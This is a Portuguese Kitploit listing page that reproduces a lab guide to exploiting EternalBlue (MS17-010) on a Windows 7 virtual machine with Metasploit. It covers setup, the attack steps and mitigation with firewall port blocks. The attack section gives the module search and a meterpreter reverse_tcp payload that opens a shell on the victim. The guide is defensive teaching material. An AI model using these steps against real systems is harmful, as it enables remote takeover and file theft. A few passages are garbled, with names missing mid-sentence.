Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — Guia de laboratório passo a passo demonstrando a exploração do EternalBlue (CVE-2017-0144) contra o protocolo SMB do Windows 7 usando Metasploit, incluindo etapas de configuração, exploração e mitigação. | Kitploit
Ferramentas/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

Guia de laboratório passo a passo demonstrando a exploração do EternalBlue (CVE-2017-0144) contra o protocolo SMB do Windows 7 usando Metasploit, incluindo etapas de configuração, exploração e mitigação.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

LAB: ATAQUE AO SISTEMA OPERACIONAL WINDOWS COM BASE NA VULNERABILIDADE DO PROTOCOLO SMB.

  • 1. DESCRIÇÃO
  • 2. INTRODUÇÃO GERAL
  • 3. PREPARAÇÃO
  • 4. EXECUÇÃO DO ATAQUE
  • 5. COMO SE PREVENIR

1. DESCRIÇÃO

Neste laboratório usaremos dois computadores para simular um ataque baseado na vulnerabilidade do protocolo SMB do Sistema Operacional Windows. Uma máquina executa o Sistema Operacional Kali Linux, desempenhando o papel de atacante (hacker). E um computador desempenha o papel de máquina vítima (victim). A máquina victim está executando o Sistema Operacional Windows 7 64 bits, que contém a vulnerabilidade SMB. Para fazer isso, na máquina Kali Linux usaremos o código de exploração chamado EternalBlue para atacar a máquina Windows 7.

2. INTRODUÇÃO GERAL

Server Message Block (SMB) é um protocolo de compartilhamento de arquivos bastante comum na plataforma Windows da Microsoft. Graças a esse protocolo SMB, os computadores Windows conectados entre si na mesma camada de rede ou no mesmo Domain podem compartilhar arquivos entre si. Até hoje, o SMB também é conhecido como Common Internet File Sharing (CIFS).

EternalBlue é um código de exploração de informações, baseado na vulnerabilidade do protocolo SMB através da porta 445. Inicialmente, EternalBlue foi desenvolvido pela Agência de Segurança Nacional dos Estados Unidos (NSA). O nome completo em inglês é U.S. National Security Agency. Mas depois, ele foi vazado pelo grupo Hacker The Shadow Brokens em 2017. Também no mesmo ano. Uma onda de ataques em grande escala do Vírus de criptografia de dados – Ransomware, visando computadores Windows da Microsoft, ocorreu em todo o mundo. Entre eles, o mais famoso ainda é o vírus . Até hoje, embora essa vulnerabilidade tenha sido corrigida pela Microsoft com a atualização de segurança . No entanto, no mundo, um grande número de computadores executando o Sistema Operacional Windows ainda apresenta essa vulnerabilidade. Essa vulnerabilidade foi publicada em . (Windows SMB Remote Code Execution Vulnerability). Essa vulnerabilidade é extremamente perigosa e muito fácil de ser explorada. O que vale ressaltar é que para atacar através dessa vulnerabilidade do protocolo SMB. O hacker não precisa enviar ou enganar a vítima para baixar ou executar qualquer vírus malicioso. Ou seja, a vítima, mesmo sem fazer nada, ainda pode ser facilmente atacada pelo hacker, que assume o controle do computador sem que ela perceba.

WannaCry
MS17-010
CVE-2017-0144

3. PREPARAÇÃO

Prepare 02 máquinas virtuais executando no software VMware Workstation:

  • Máquina virtual Kali Linux (máquina hacker) com endereço IP: 192.168.198.140
  • Máquina virtual Windows 7 (máquina victim) com endereço IP: 192.168.198.143

  1. Na máquina virtual Kali(attack):

    • Verificar o ip: ifconfig
    • Iniciar o serviço Postgresql: service postgresql start
    • Verificar se o postgresql já está em execução usando o comando: service postgresql status
  2. Na máquina virtual Windows 7(victim):

    • Verificar o ip : ipconfig
    • Desligar o Firewall

4. EXECUÇÃO DO ATAQUE

  • Na máquina Kali: Entrar no Metasploit com o comando: msfconsole

  • Quando já estiver no Metasploit, procuramos as falhas bem como as sintaxes relacionadas ao ms17_010 com o comando: search ms17_010

  • Adicionar o endereço IP da máquina victim e da máquina attack
  • Configurar o payload para explorar: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • Executar o exploit para realizar a exploração
  • Abrir o shell na máquina da vítima (executado através do terminal da máquina attack) após conseguir invadir

=>Aqui, considera-se que o hacker já invadiu com sucesso a máquina victim. Nesse momento, o hacker pode apagar, roubar arquivos da máquina da vítima sem que ela perceba. Até mesmo, o hacker pode enviar e executar vírus diretamente nela.

5. COMO SE PREVENIR

Para evitar ser explorado e ter o protocolo SMB utilizado indevidamente. Precisamos realizar algumas tarefas a seguir:

  • Ativar o firewall (Firewall).
  • Atualizar o Windows para a versão mais recente. Ou baixar e instalar as correções de segurança da Microsoft. Especialmente a correção de segurança ms17_010.
  • Bloquear as portas 135, 445.
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
Baixar ferramenta